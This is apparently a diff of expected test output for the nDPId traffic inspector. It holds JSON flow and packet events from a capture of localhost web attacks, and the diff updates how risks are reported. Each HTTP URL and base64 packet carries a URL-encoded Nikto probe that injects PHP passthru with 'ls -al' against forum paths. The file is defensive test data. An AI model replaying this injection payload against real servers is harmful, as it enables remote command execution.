-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"}
-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00885{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="}
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00897{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="}
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
